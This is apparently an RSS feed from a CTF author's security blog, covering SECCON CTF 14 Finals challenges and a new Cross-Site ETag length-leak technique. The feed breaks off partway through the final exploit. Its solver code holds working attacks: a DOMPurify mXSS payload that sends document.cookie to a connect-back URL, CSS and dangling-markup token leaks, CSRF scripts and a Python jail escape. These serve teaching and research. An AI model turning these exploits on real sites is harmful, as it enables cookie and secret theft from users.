XS-Spin Blog Blog https://blog.arkark.dev/ XS-Spin Blog Blog Sun, 08 Mar 2026 00:00:00 GMT https://validator.w3.org/feed/docs/rss2.html https://github.com/jpmonette/feed en <![CDATA[SECCON CTF 14 Finals 作問感想]]> https://blog.arkark.dev/2026/03/08/seccon-finals https://blog.arkark.dev/2026/03/08/seccon-finals Sun, 08 Mar 2026 00:00:00 GMT 2/28〜3/1の2日間、SECCON CTF 14の本戦が行われました!

参加した皆さんありがとうございます & 入賞したみなさんおめでとうございます 🎉

今年は、1日目がJeopardyで2日目がKing of the Hillという競技形式でした。両日でまったく異なる競技形式であるため、1〜2日目の間の夜に寝る間も惜しんで問題に挑む今までの慣習(いわゆる宿題)がなかったのは参加者視点だと大きかったかと思います。

私はJeopardyのweb問とjail問を作問しました。Slay the Noteは特におすすめです!

ChallengeCategoryIntended
Difficulty		Solved / 9
(Internatinal)		Solved / 9
(Domestic)		Keywords
Warmupwebwarmup99stream
DOMDOMDOMPurifywebeasy99DOMPurify, mXSS
Shadow CSSwebmedium10Firefox, Link
Slay the Notewebmedium00cookie parser
increasingjailmedium44pyjail

各問題のソースコードやソルバはリポジトリにpush済みです:

※ この記事はwriteupではなくて作問の背景や感想です。

Jeopardyは1日目の9時間開催であり、4人チームで各自が自分の得意ジャンルを挑むことを考慮すると、実質ソロ参加の9時間CTFです。その想定で全体の難易度を調整したつもりで問題セットを用意しました。

結果だけ見ると、webについては、比較的簡単めな2つの問題はAI-solvableだったみたいで全チームに解かれ、残り2問はほとんど解かれないという順位の差が付かないものになってしまいました。AIチェックが甘かったのは完全に準備不足だったので申し訳ないです。そうなった細々とした理由はありますが、脱線するので後述します。Slay the Noteは、ほとんど答えまで行っていたチームが複数あったので、あと数時間くらい時間が長ければsolvesは増えていたかもしれないです。

LLM時代のCTF

info

自分の今の考えを一度言語化しておきたくてこの章を用意したけど、読み飛ばして大丈夫です。

昨今のAIブームを見るにLLM時代のCTFについての話題を見かけることも増えてきたので、ここで触れておきます。「CTFは終わったのか? / 終わるのか?」という話は1年ちょっと前くらいからずっとされてましたし、実際、今回のSECCON CTF本戦ではすべてのチームがLLMをメイン武器として利用していたと思います。

※ カテゴリによって見えている景色は大きく異なっているようで、傍から見ると「reversing → crypto → web → pwn」の順にLLMの躍進が目立っている印象です。私の視点ではwebしか見えていないので、以下は webに対する言及 であって他カテゴリについてはノーコメントの立場です。

現状は以下の印象です:

  • 典型問題や初心者向けの易しい問題: AIに投げるだけで解ける
  • 典型ではなく少し発展的な問題: 適切な誘導を与えればAIで解ける
  • 新規性やクリエイティブ性のある問題: まだAIで解けない

中難易度帯の一部と高難易度帯では競技としてまだ成立している感覚です。実際、今回のShadow CSSやSlay the Noteは全然解かれていません。また、AI活用のうまさやPay to Winの本気度によって多少のブレはあるので、みんながみんなAIを使えば同等の力が得られるというわけではないのでそこは勘違いしないようにしたいです。難しい問題はAIで解けないと書きましたが、AIを活用・連携しながら解くのは当たり前の時代です。

さて、現状は現状として、上記の"AI-solvability"のグラデーション(というか閾値)のようなものが現在進行系で押し上げられているのも事実です。AIで簡単に解けてしまう領域に関しては競技性は完全に失われてしまうので、その領域がどんどん大きくなっている実情を踏まえると "競技性をCTFに求めるなら" 将来的にオワコンになっていくのは自然な流れです。そこは素直に受け止めたいです。

とはいえ正直なところ、オンラインCTFで0〜2 solvesのボス問相当の問題になると、完全に新規の攻撃手法であったり異常なout-of-the-boxを求められたりするので、今後もAIだけで解くのは難しいのではないかと思っています。逆にそれらがAIに解かれるようになると、世の中の「研究」に類いするものはすべて価値をなくしてしまいそうです。いずれその未来がやってくる可能性は否定できないですが、もしそこまできたらCTFどうこうの話以前に社会構造が変わるレベルまで影響しそうなので一旦気にしなくていいと思います。いや、気にするべきではあるんですがだいぶスケールの大きな話になりそうなので。

というわけで、そのレベルの難易度帯が出題されるCTFは今後もしばらく生き残れそうなんですが、一部のトップ層の人しか楽しめないコンテンツになりそうという懸念はあります。

大局的には、「CTFは 競技として みんなが楽しめるコンテンツだ」という幻想はもう捨ててしまって、純粋に 娯楽や教育目的として のCTFにシフトしていくと良さそうかなと思います。もしくは、Intigritiが一時期やっていた、「高難易度なXSSチャレンジを1問だけ出題 → 1週間程度の締め切りを設定した上でみんなに挑んでもらう」みたいな企画は別の切り口としてありかもです。

せっかくここまで成熟した(?)コミュニティではあるので、CTFは終わったんだという風な煽りや悲観はむやみにせずに、娯楽としてまだまだ楽しめる余地がたくさんあるという方向性で世間の関心が向くといいなあと考えています。コンピュータ・サイエンスを絡めたパズルを遊ぶのはおもしろいですし、もっと広まってほしいです。

ちなみに元々私は楽しく遊べたらいいじゃん派であって、順位とかはサブ要素としてしか感じていなかったので現状に悲観的な立場ではないです。競技ジャンキーな人たちにとってはつらいかもです。

[web] Warpup

問題文:

warpup = warp + warmup

- Challenge: http://warpup.{int,dom}.seccon.games:3000

ソースコード & ソルバ:

様々な言語でstreamのインターフェイスを備えた機能を標準ライブラリやフレームワーク等で提供されていることが増えてきてるんですが、特にutf-8エンコード/デコードでありがちな罠をテーマに出題してみました。

元ネタはこちらです:

今回の問題では、以下の通りリクエストボディをstreamで読み込んでいます。最終的にパストラバーサルで /proc/self/environ を読めばフラグが手に入ります。

backend/src/main.rs
async fn read_file(
    body: impl Stream<Item = Result<impl bytes::Buf, warp::Error>>,
) -> impl warp::Reply {
    let path: String = body
        .fold(String::from("./"), |mut path, buf| async move {
            let mut buf = buf.unwrap();
            while buf.has_remaining() {
                let chunk = buf.chunk();
                path += &String::from_utf8(chunk.into()).unwrap_or_default();
                buf.advance(chunk.len());
            }
            path
        })
        .await;

    fs::read_to_string(&path).unwrap_or(format!("Not Found: {}", &path).into())
}

String::from_utf8(chunk.into()).unwrap_or_default() で、デコードが失敗したら unwrap_or_default で握りつぶしている処理が重要です。また、長いペイロードを一気に投げるとチャンクが分割されるので、マルチバイト文字の途中でちょうど分割されるような長い文字列を渡すと、すべて無視されて空文字列になります。

また、以下のようなプロキシが用意されており、 waf 関数によって単純なパストラバーサルが防がれているのでどうすればよいかという問題でした:

proxy/app.py
import socket, select, threading

LISTEN = ("0.0.0.0", 3000)
UPSTREAM = ("backend", 3000)


def waf(req: str) -> bool:
    return (
        # Path traversal?
        ".." in req
        or
        # Transfer-Encoding?
        "transfer" in req.lower()
    )


def proxy(client: socket.socket, upstream: socket.socket):
    rlist = [client, upstream]
    for conn in rlist:
        conn.settimeout(0.2)

    req = b""
    while rlist:
        r, _, _ = select.select(rlist, [], [], 10)
        if not r:
            break
        for src in r:
            dst = [client, upstream][src is client]

            data = b""
            while True:
                try:
                    data += src.recv(65536)
                except (BlockingIOError, TimeoutError) as e:
                    break
            if not data:
                dst.shutdown(socket.SHUT_WR)
                rlist.clear()
                break

            if src is client:
                req += data
                if waf(req.decode()):
                    client.sendall(
                        b"HTTP/1.1 403 Forbidden\r\n"
                        b"Content-Type: text/plain\r\n"
                        b"Content-Length: 0\r\n"
                        b"Connection: close\r\n\r\n"
                    )
                    rlist.clear()
                    break

            dst.sendall(data)


def handle(client: socket.socket):
    try:
        upstream = socket.create_connection(UPSTREAM, timeout=10)
        proxy(client, upstream)
    finally:
        for conn in (client, upstream):
            try:
                conn.close()
            except:
                pass


def main():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(LISTEN)
        sock.listen(socket.SOMAXCONN)
        print(f"* forwarding {LISTEN} -> {UPSTREAM}")
        while True:
            client, _ = sock.accept()
            threading.Thread(target=handle, args=(client,), daemon=True).start()


if __name__ == "__main__":
    main()

ソルバはこちらです:

HTTP/1.1で適切にsleepを入れつつ長いペイロードを送れば解けるんですが、HTTP/2で(AIが)がんばって解いたチームが多かった雰囲気です。

AIチェックは行ったつもりだったんですが、甘かったようです。 HTTP/2解法は想定していなくて、実際にAIがHTTP/2で解こうとする様子は確認できてたんですが、回答を待ちきれずに「HTTP/2路線で考えるのはやめてください」と指示を出してしまっていたような記憶があります。本当に良くない。

まったくコンテキストを入れずに、純粋に解いてもらうようにテストするべきでした。

[web] DOMDOMDOMPurify

問題文:

DOM DOM DOM

- Challenge: http://domdomdom.{int,dom}.seccon.games:3000
- Admin bot: http://domdomdom.{int,dom}.seccon.games:1337

ソースコード & ソルバ:

以下のHTMLファイルでXSSをやってくださいという問題でした。シンプルなDOMPurifyパズルです。

<body>
  <h1>XSS Challenge</h1>
  <form action="/" method="get">
    <input name="x" placeholder="{X}" required />
    <input name="y" placeholder="{Y}" required />
    <input name="z" placeholder="{Z}" required />
    <button type="submit">Go</button>
  </form>
  <main id="result" style="font-size: 2em; padding: 0.5em">{X}{Y}{Z}</main>
  <script
    src="https://cdn.jsdelivr.net/npm/dompurify@3.3.1/dist/purify.min.js"
    integrity="sha256-m0lAV/rWZW/ZziCJ0LaJjfljLBDkXkd1pDBzpGz/yMs="
    crossorigin="anonymous"
  ></script>
  <script>
    DOMPurify.addHook("afterSanitizeAttributes", (node) => {
      for (const { name, value } of node.attributes) {
        if (/[{}]/.test(value)) node.attributes.removeNamedItem(name);
      }
    });

    const [[, x], [, y], [, z]] = new URLSearchParams(location.search);
    if (x && y && z)
      result.innerHTML = "{X}{Y}{Z}"
        .replace("{X}", () => DOMPurify.sanitize(`<span>${x}</span>`))
        .replace("{Y}", () => DOMPurify.sanitize(`<span>${y}</span>`))
        .replace("{Z}", () => DOMPurify.sanitize(`<span>${z}</span>`));
  </script>
</body>

本来は属性値で {} の文字種が使えないように制約を与えたつもりだったんですが、普通にバグっており少しfor文を騙せば属性値で使用可能でした。流石に簡単すぎるのでAIに瞬殺です。

今までの作問の中で一番しょうもない作問ミスなので反省です。すみません...

想定解は以下です:

const x = `<style><{Y}/style> <{Z}img src onerror=eval(decodeURIComponent(location.hash.slice(1)))></style>`;

// ref. https://github.com/cure53/DOMPurify/blob/3.3.1/src/purify.ts#L1080-L1090
const y = `&lt;a<!--`;
const z = `&lt;a<!--`;

const xss = `navigator.sendBeacon("${CONNECTBACK_URL}/flag", document.cookie)`;
const url = `http://web:3000?${new URLSearchParams({ x, y, z })}#${encodeURIComponent(xss)}`;

DOMPurify.sanitize("<span>&lt;a<!--</span>") の結果は空文字列になるので、それをうまくパズルに組み込めば解けます。

DOMPurify.sanitize(`<span>${y}</span>`)

の結果が空文字列にする方法はありますか?とLLMに聞くと答えてくれるので、DOMPurifyの細かい挙動を確認しつつ軽めのパズルをし、適切な誘導をLLNMに与えれば解けるという塩梅を狙ってました。

[web] Shadow CSS

問題文:

Shadow DOM is not a security boundary, but a fun CTF toy :)

- Challenge: http://shadow-css.{int,dom}.seccon.games:3000
- Admin bot: http://shadow-css.{int,dom}.seccon.games:1337

ソースコード & ソルバ:

問題サーバのソースコードは以下だけです:

import express from "express";
import cookieParser from "cookie-parser";

const template = `
<!DOCTYPE html>
<html>
  <head>
    <style>{{CSS}}</style>
  </head>
  <body>
    <h1>Shadow CSS 👤</h1>
    <div>
      <template shadowrootmode="closed">
        <div data-token="{{TOKEN}}"></div>
      </template>
    </div>
  </body>
</html>
`.trim();

express()
  .use(cookieParser())
  .get("/", (req, res) => {
    const { css = "", k, v } = req.query;
    const TOKEN = req.cookies.TOKEN ?? "TOKEN_0123456789abcdef01234567";

    const html = template
      .replace("{{TOKEN}}", () => TOKEN.replace(/[<>"]/g, ""))
      .replace("{{CSS}}", () => css.replace(/[<>]/g, ""));

    if (k && v) res.header(k, v);
    res.type("html").end(html);
  })
  .listen(3000);

botの TOKEN クッキーを盗むのがゴールで、ブラウザは Firefox です。

CSSインジェクションとヘッダのkey/valueを1組指定可能な状態で、Shadow DOM内の属性値の値を盗むことが可能か?という問題でした。

以下のkinugawaさんのスライドにもある通り、CSSの継承を悪用すればCSSインジェクションでShadow DOM内の テキスト をリークすることは可能ですが、 属性値 をリークするのは難しいです:

属性値リークは私も色々挑戦したのですが今のところ有効な手法は思いついていないです(もし、思いついた人がいたら教えてください!)。 というわけで、CSSインジェクションに加えてヘッダインジェクションが可能だったらリークできるか?という問題に昇華してみました。

想定解はLinkヘッダによるCSS読み込みです。現状主要なブラウザでLinkヘッダにstylesheetを指定可能なのはFirefoxのみです。Linkヘッダでは通常の <link> 要素と同様にintegrityを指定できるので、SRIチェックによって Content-Lengthでレスポンスサイズを調整しつつ一文字ずつ特定することが可能です。2年前に私が出題した「cgi-2023」とオラクルの作り方が似ているので参考になると思います:

こんな感じでリーク可能です:

<body>
  <script
    src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"
    integrity="sha512-a+SUDuwNzXDvz4XrIcXHuCf089/iJAoN4lmrXJg18XnduKK6YlDHNRalv4yd1N40OKI80tFidF+rqTFKGPoWFQ=="
    crossorigin="anonymous"
    referrerpolicy="no-referrer"
  ></script>

  <script type="module">
    const BASE_URL = "http://web:3000";
    const CHARS = [..."0123456789abcdef"];

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const calcIntegrity = (data) => "sha256-" + CryptoJS.enc.Base64.stringify(CryptoJS.SHA256(data));

    const getCss = (css, prefix) => {
      return (
        `
<!DOCTYPE html>
<html>
  <head>
    <style>{{CSS}}</style>
  </head>
  <body>
    <h1>Shadow CSS 👤</h1>
    <div>
      <template shadowrootmode="closed">
        <div data-token="
        `
          .trim()
          .replace("{{CSS}}", css) + prefix
      );
    };

    const win = open("");
    await sleep(100);

    const leak = async (known) => {
      const links = [];
      for (const c of CHARS) {
        const prefix = known + c;

        const innerCss = `{} h1 { background: url(${location.origin}/leak?prefix=${prefix}) }`;
        const outerCss = getCss(innerCss, prefix);

        const integrity = calcIntegrity(outerCss);
        const link = `</?${new URLSearchParams({
          css: innerCss,
          k: "Content-Length",
          v: new TextEncoder().encode(outerCss).length,
        })}>; rel=stylesheet; integrity=${integrity}`;

        links.push(link);
      }

      const url = `${BASE_URL}/?${new URLSearchParams({
        k: "Link",
        v: links.join(", "), // https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Link#specifying_multiple_links
      })}`;

      win.location = url;

      return await Promise.race([
        fetch(`/known?length=${known.length + 1}`).then((r) => r.text()),
        sleep(1000),
      ]);
    };

    let known = "TOKEN_";
    for (let i = 0; i < 12 * 2; i++) {
      console.log({ known });
      known = await leak(known);
    }

    navigator.sendBeacon("/token", known);
  </script>
</body>

ちなみに、botのtimeoutは10秒に設定されておりXS-Leakにしてはかなり短くて、高速なオラクルでないといけません。

実はLinkヘッダはカンマ区切りで複数のリンクを指定可能です。想定解ではこれを利用して高速化を行っており約5秒程度でリークが完了します:

また、ちょっとしたtipsですが、通常はドキュメントがQuirks Modeではない場合は Content-Type: text/html のレスポンスをCSSとして読み込むのはブラウザに拒否されますが、Linkヘッダによる読み込みの場合はその限りではないようです。

[web] Slay the Note

問題文:

🐍 Snecko Eye 👁

- Challenge: http://slay-the-note.{int,dom}.seccon.games:3000
- Admin bot: http://slay-the-note.{int,dom}.seccon.games:1337

ソースコード & ソルバ:

問題サーバのソースコードは以下だけです:

import Koa from "koa";
import Router from "@koa/router";
import bodyParser from "@koa/bodyparser";
import sanitize from "sanitize-html";
import fs from "node:fs";
import crypto from "node:crypto";

const app = new Koa();
app.use(bodyParser());

app.use((ctx, next) => {
  const nonce = crypto.randomBytes(8).toString("base64");
  ctx.set(
    "Content-Security-Policy",
    `script-src 'nonce-${nonce}'; style-src 'nonce-${nonce}'; base-uri 'none'`,
  );
  ctx.nonce = nonce;

  ctx.notes = ((v) => (v ? v.split("|") : []))(ctx.cookies.get("notes"));
  next();
  ctx.cookies.set("notes", ctx.notes.join("|"));
});

const router = new Router()
  .get("/", (ctx) => {
    ctx.type = "html";
    ctx.body = fs
      .readFileSync("index.html", { encoding: "utf-8" })
      .replaceAll("{{NONCE}}", () => ctx.nonce);
  })
  .get("/notes", (ctx) => {
    ctx.type = "json";
    ctx.body = ctx.notes;
  })
  .post("/new", (ctx) => {
    const note = sanitize(
      `<article>${String(ctx.request.body.note).slice(0, 1024)}</article>`,
    );
    ctx.notes.push(note);
    ctx.notes.sort();
    ctx.redirect("/");
  });

app.use(router.routes()).use(router.allowedMethods());

app.listen(3000);

以下の通りbotはTOKENをノートとして投稿するので、そのノートの内容をリークするのがゴールです:

  const context = await browser.createBrowserContext();

  try {
    // Create a token note
    const page1 = await context.newPage();
    await page1.goto(challenge.appUrl, { timeout: 3_000 });
    await page1.waitForSelector("#create");
    await page1.type("#create input[name=note]", token);
    await page1.click("#create input[type=submit]");
    await sleep(1_000);
    await page1.close();
    await sleep(1_000);

    // Visit the given URL
    const page2 = await context.newPage();
    await page2.goto(url, { timeout: 5_000 });
    await sleep(15_000);
    await page2.close();
  } catch (e) {
    console.error(e);
  }

この問題で一番重要なのはKoa(が依存しているcookies)のcookie parserの以下の処理です:

https://github.com/pillarjs/cookies/blob/0.9.1/index.js#L95
  if (value[0] === '"') value = value.slice(1, -1)

なんと、Cookieの値部分で先頭に " が存在した場合、パース時に先頭と末尾がそれぞれ1文字ずつ落とされます。 加えてアプリケーションのロジックをよく読むと | の取り扱いがおかしいので、この2つのギミックを利用してパズルをすると解けます:

<body>
  <form id="create" action="..." method="post" target="win">
    <input type="text" name="note" />
  </form>
  <script type="module">
    const BASE_URL = "http://web:3000";

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const win = open("", "win");
    const createNote = async (note) => {
      const form = document.forms[0];
      form.action = `${BASE_URL}/new`;
      form.note.value = note;
      form.submit();
      await sleep(500);
    };

    const deleteLast = async (num) => {
      for (let i = 0; i < num; i++) {
        win.location = `${BASE_URL}/notes`;
        await sleep(100);
      }
    };

    await createNote(`Y|${'"'.repeat(20)}`);
    await createNote(`Z|$<table></table>`);
    await deleteLast(`></table></article>`.length - 2 - 1);
    await createNote(`|/background="${location.origin}/leak?dangling=`);
    await createNote(`X"<table></table>`);
    // ref. https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#background-attribute
  </script>
</body>

sanitize-htmlが結構固くて、最後に <table background=... という古のテクニックを使うのは盲点だったかなと思います。ちなみに私はChatGPTに聞きました:

解法については、st98さんのwriteupがかなり丁寧に書かれていてわかりやすいので参考にしてください:

作問背景としては、趣味でパーサの実装を眺めていたらたまたまおもしろい実装を見かけたので、それをそのままパズルに落とし込んでみました。パズルとしては自信作なので、色んな人に挑戦してもらえるとうれしいです!

昨年出題したtwisty-xssも、XSSパズルとしておすすめです。パズルしましょう。

ところでSlay the Spire 2がかなりおもしろいです。助けてください。

[jail] increasing

問題文:

a bb ccc dddd eeeee ffffff ggggggg ...

`nc increasing.seccon.games 5000`

ソースコード & ソルバ:

本戦で1問だけ出題されたjail問です。複数問を用意しても良かったんですが、4人チームでjail担当でやってくる人はあまりいないだろうということで自粛しました。

内容はpyjailです:

code = input("code> ")[:130]

if not code.isascii():
    print("bye")
    exit(1)

max_len = 0
for m in __import__("re").finditer(r"\w+", code):
    if len(m[0]) <= max_len:
        print("bye")
        exit(1)
    max_len = len(m[0])

eval(code, {"__builtins__": {}})

狭義単調増加プログラミングをやってください、ただし130文字以内で...という問題でした。

意味不明な問題設定ですが、jailCTF 2025のprimalから問題アイデアが生まれました:

primalの方は長さが素数になっているものしか使えないという制限でした。不可思議な制限でもちゃんと問題として成立しているのはおもしろいなと思います。

さて、今回の問題increasingの想定解は以下でした(124文字):

(__builtins__:=[].__reduce_ex__(-~(()==()))[()<()].__getattribute__("\u0000__builtins__"[()==():]))["\U00000062reakpoint"]()

同じ解法の人はいましたか?

__builtins__を上書きすることで breakpoint() を呼べるようにしています。 \U00000062 がきれいにはまっているのが推しポイントです。

]]> CTF <![CDATA[Cross-Site ETag Length Leak]]> https://blog.arkark.dev/2025/12/26/etag-length-leak https://blog.arkark.dev/2025/12/26/etag-length-leak Fri, 26 Dec 2025 00:00:00 GMT I recently discovered a new client-side attack technique that leaks the length of an ETag from a cross-site page. This can be used as an XS-Leak oracle and I created a CTF challenge as a proof of concept.

impossible-leak is one of the challenges I authored for SECCON CTF 14 Quals1:

This technique is likely applicable beyond this specific challenge. We can use it as an unintended solution in other XS-Leak challenges. In fact, I first came up with it as an unintended approach during an earlier CTF and later refined it into a standalone technique.

Challenge Overview

The target is a very simple note-taking application.

Server-side code:

web/index.js
import express from "express";
import session from "express-session";
import crypto from "node:crypto";

const db = new Map();
const getNotes = (id) => {
  if (!db.has(id)) db.set(id, []);
  return db.get(id);
};

const app = express()
  .set("view engine", "ejs")
  .use(express.urlencoded())
  .use(
    session({
      secret: crypto.randomBytes(16).toString("base64"),
      resave: false,
      saveUninitialized: true,
    })
  );

app.get("/", (req, res) => {
  const { query = "" } = req.query;
  const notes = getNotes(req.session.id).filter((note) => note.includes(query));
  res.render("index", { notes });
});

app.post("/new", (req, res) => {
  const note = String(req.body.note).slice(0, 1024);
  getNotes(req.session.id).push(note);
  res.redirect("/");
});

app.listen(3000);

Template file:

web/views/index.ejs
<!DOCTYPE html>
<html>
  <body>
    <h1>Notes</h1>
    <form id="create" action="/new" method="post">
      <div>
        <input type="text" name="note" required />
        <input type="submit" value="Create" />
      </div>
    </form>
    <ul>
      <% notes.forEach(note => {%>
        <li><%= note %></li>
      <% }); %>
    </ul>
    <form action="/" method="get">
      <div>
        <input type="text" name="query" />
        <input type="submit" value="Search" />
      </div>
    </form>
  </body>
</html>

Endpoints:

  • GET /: Shows your notes.
    • No HTML injection.
    • Supports searching via the query parameter.
  • POST /new: Creates a note.
    • Vulnerable to CSRF.

Notes page:

Search results for SECCON{r:

The goal is to leak the bot's note (the flag):

bot/conf.js
// Create a flag note
const page1 = await context.newPage();
await page1.goto(challenge.appUrl, { timeout: 3_000 });
await page1.waitForSelector("#create");
await page1.type("#create input[name=note]", flag.value);
await page1.click("#create input[type=submit]");
await sleep(1_000);
await page1.close();
await sleep(1_000);

// Visit the given URL
const page2 = await context.newPage();
await page2.goto(url, { timeout: 3_000 });
await sleep(60_000);
await page2.close();

The timeout is relatively long (60s), so this looks like an XS-Leak challenge. However:

  • There is no HTML injection.
  • There is no sorting feature.
  • There is no CSS.
  • There is no extra resource loading.

These conditions make typical XS-Leak approaches difficult to apply.

Solution

Step 1: ETag Header Length

The first step in solving such challenges is to carefully compare observable differences between:

  • when the search hits the flag note, and
  • when it misses.

When the search hits:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 484
ETag: W/"1e4-Mfh5EeZSATTUBTZ0fvEzgdvLYu4"
Date: ...
Connection: keep-alive
Keep-Alive: timeout=5

... snip ...

When it misses:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 443
ETag: W/"1bb-Ouz/TB1WQCg6QhEFVloBFY6TJKk"
Date: ...
Connection: keep-alive
Keep-Alive: timeout=5

... snip ...

The response body is larger when it hits (because it renders the matching note), so Content-Length changes. The key observation is that the ETag value changes too and more importantly, its length can change.

In this app, the ETag is generated by jshttp/etag. The format includes the content size in hex as a prefix:

W/"{{ stat.size.toString(16) }}-{{ stat.mtime.getTime().toString(16) }}"

Reference: https://github.com/jshttp/etag/blob/v1.8.1/index.js#L126-L131

Because the size is encoded in hex, the number of hex digits changes at boundaries (e.g., 0xfff -> 0x1000). That means the ETag length can differ by 1 depending on whether the response size crosses such a boundary.

In this challenge, we can control the response size by abusing CSRF to create many notes in the victim's session. This allows us to manipulate the total response size so that:

  • search hit -> response size becomes 0x1000 + ... (4 hex digits)
  • search miss -> response size stays at 0xfff (3 hex digits)

It produces a 1-byte difference in the ETag length.

Below is an example CSRF page that prepares two prefixes: one that matches the flag note (SECCON{r...) and one that does not.

<body>
  <form id="create" action="..." method="post" target="csrf">
    <input type="text" name="note" />
  </form>
  <script type="module">
    const BASE_URL = "http://web:3000";

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const csrfWin = open("about:blank", "csrf");
    const createNote = async (note) => {
      const form = document.forms[0];
      form.action = `${BASE_URL}/new`;
      form.note.value = note;
      form.submit();
      await sleep(100);
    };

    const prepared = new Set();
    const prepare = async (prefix) => {
      if (prepared.has(prefix)) return;
      prepared.add(prefix);

      const initialLen = 443;
      const part = "\n        <li>" + "</li>\n      ";

      let len = initialLen;
      while (16 ** 3 - len - part.length - 1 > 0) {
        const note = prefix.padEnd(
          Math.min(1024, 16 ** 3 - len - part.length - 1),
          "*"
        );
        len += note.length + part.length;
        await createNote(note);
      }
    };

    await prepare("SECCON{r"); // Matches `SECCON{redacted}`
    await prepare("SECCON{x"); // Does not match `SECCON{redacted}`
  </script>
</body>

After visiting the page, the responses appear as follows.

Hit (?query=SECCON{r):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 4136
ETag: W/"1028-7DssyPmtuJFW+hsMczlljuIGJC8"
Date: ...
Connection: keep-alive
Keep-Alive: timeout=5

... snip ...

Miss (?query=SECCON{x):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 4095
ETag: W/"fff-j/5Cw0uvoM8vDCtG7hABgyD9RvM"
Date: ...
Connection: keep-alive
Keep-Alive: timeout=5

... snip ...

  • Hit: ETag: W/"1028-7DssyPmtuJFW+hsMczlljuIGJC8"
    • Response size: 0x1028
    • ETag length: 36
  • Miss: ETag: W/"fff-j/5Cw0uvoM8vDCtG7hABgyD9RvM"
    • Response size: 0xfff
    • ETag length: 35
info

The ETag format is implementation-defined. In particular, many implementations (including jshttp/etag) can generate ETags whose length is not constant.

Examples of software that can generate variable-length ETags:

Step 2: 431 Status Error

What can we do with this 1-byte difference in ETag length?

If a response includes an ETag header, a subsequent request to the same URL will include the If-None-Match header:

  • Hit: If-None-Match: W/"1028-7DssyPmtuJFW+hsMczlljuIGJC8"
  • Miss: If-None-Match: W/"fff-j/5Cw0uvoM8vDCtG7hABgyD9RvM"

So the request headers on the second navigation become slightly longer in the hit case.

Many web servers enforce a maximum allowed size for request headers (including the request-line) as a DoS mitigation. If the request exceeds this limit, the server returns 431 Request Header Fields Too Large.

In this challenge, Express runs on node:http, which has a request header size limit http.maxHeaderSize (default: 16 KiB):

https://github.com/nodejs/node/blob/v25.2.1/src/node_options.h#L159
uint64_t max_http_header_size = 16 * 1024;

By padding the URL so that the total header size is right at the threshold, the extra 1 byte in If-None-Match can be the difference between:

  • If the header size is still under the limit: 200 OK
  • If the header size is just over the limit: 431 Request Header Fields Too Large

If the URL is "http://web:3000?query=SECCON{r&" + "X".repeat(15834) (hit case):

  • 1st access: 200 OK
  • 2nd access: 431 Request Header Fields Too Large

If the URL is "http://web:3000?query=SECCON{x&" + "X".repeat(15834) (miss case):

  • 1st access: 200 OK
  • 2nd access: 200 OK

Step 3: History API Behavior

Now we need to detect whether or not a 431 error occurs on cross-site pages.

Normally, cross-origin status codes are opaque. However, in this case, we can exploit a Chromium-specific behavior regarding session history updates.

When a navigation happens, the browser typically "pushes" a new history entry, increasing history.length by 1. However, Chromium sometimes "replaces" the current entry instead of pushing a new one.

Chromium uses should_replace_current_entry to decide between "push" and "replace":

https://source.chromium.org/chromium/chromium/src/+/df9f2fd80f9b8697c877c2c7e7f19d9f389291b8:content/browser/renderer_host/navigation_request.cc;l=7008
      blink::mojom::NavigationApiEntryRestoreReason reason =
          common_params_->should_replace_current_entry
              ? blink::mojom::NavigationApiEntryRestoreReason::
                    kPrerenderActivationReplace
              : blink::mojom::NavigationApiEntryRestoreReason::
                    kPrerenderActivationPush;

One condition that can cause "replace" is when a navigation to the same URL fails (with an invalid page_state):

Therefore, if we navigate to the same URL twice in a row and the second navigation fails due to a 431 error, those two navigations contribute only one new history entry (because the second navigation replaces the first).

This means we can detect 431 by measuring history.length on a window we control.

A minimal demo looks like this:

    let win = open("about:blank");

    const getUrl = (prefix, padLength, nonce) =>
      `${BASE_URL}/?${new URLSearchParams({
        query: prefix,
        pad: nonce.padEnd(padLength, "x"),
      })}`;

    const got431 = async (prefix, padLength) => {
      await prepare(prefix);

      const nonce = (Math.random() + "").padEnd(20, "0");
      const url = getUrl(prefix, padLength, nonce);

      const len1 = win.history.length;

      win.location = url;
      await sleep(100);
      win.location = url;
      await sleep(100);
      win.location = "about:blank";
      await sleep(100);
      const len2 = win.history.length;

      const diff = len2 - len1;
      // If a 431 error occurs: diff === 2
      // Otherwise: diff === 3

      console.log({ prefix, len1, len2, diff });
      return diff === 2;
    };

    const threshold = 15822; // TODO: Not implemented

    console.log(await got431("SECCON{r", threshold)); // -> true
    console.log(await got431("SECCON{x", threshold)); // -> false

The following diagrams illustrate the concept.

When searching for SECCON{r (flag note hit):

When searching for SECCON{x (flag note miss):

Putting It All Together

The final exploit combines:

  1. Using CSRF to create many notes, and tuning the response size near a hex boundary in ETag
  2. URL padding to push the second request near Node's header-size threshold
  3. Measuring history.length to detect whether the second navigation turns into a 431 error

The final exploit looks like this:

<body>
  <form id="create" action="..." method="post" target="csrf">
    <input type="text" name="note" />
  </form>
  <script type="module">
    const BASE_URL = "http://web:3000";
    const CHARS = [..."_abcdefghijklmnopqrstuvwxyz"];

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
    const debug = (o) => navigator.sendBeacon("/debug", JSON.stringify(o));
    // const debug = (o) => console.log(o);

    let known = new URLSearchParams(location.search).get("known") ?? "SECCON{";

    const csrfWin = open("about:blank", "csrf");
    const createNote = async (note) => {
      const form = document.forms[0];
      form.action = `${BASE_URL}/new`;
      form.note.value = note;
      form.submit();
      await sleep(100);
    };

    const prepared = new Set();
    const prepare = async (prefix) => {
      if (prepared.has(prefix)) return;
      prepared.add(prefix);

      const initialLen = 443;
      const part = "\n        <li>" + "</li>\n      ";

      let len = initialLen;
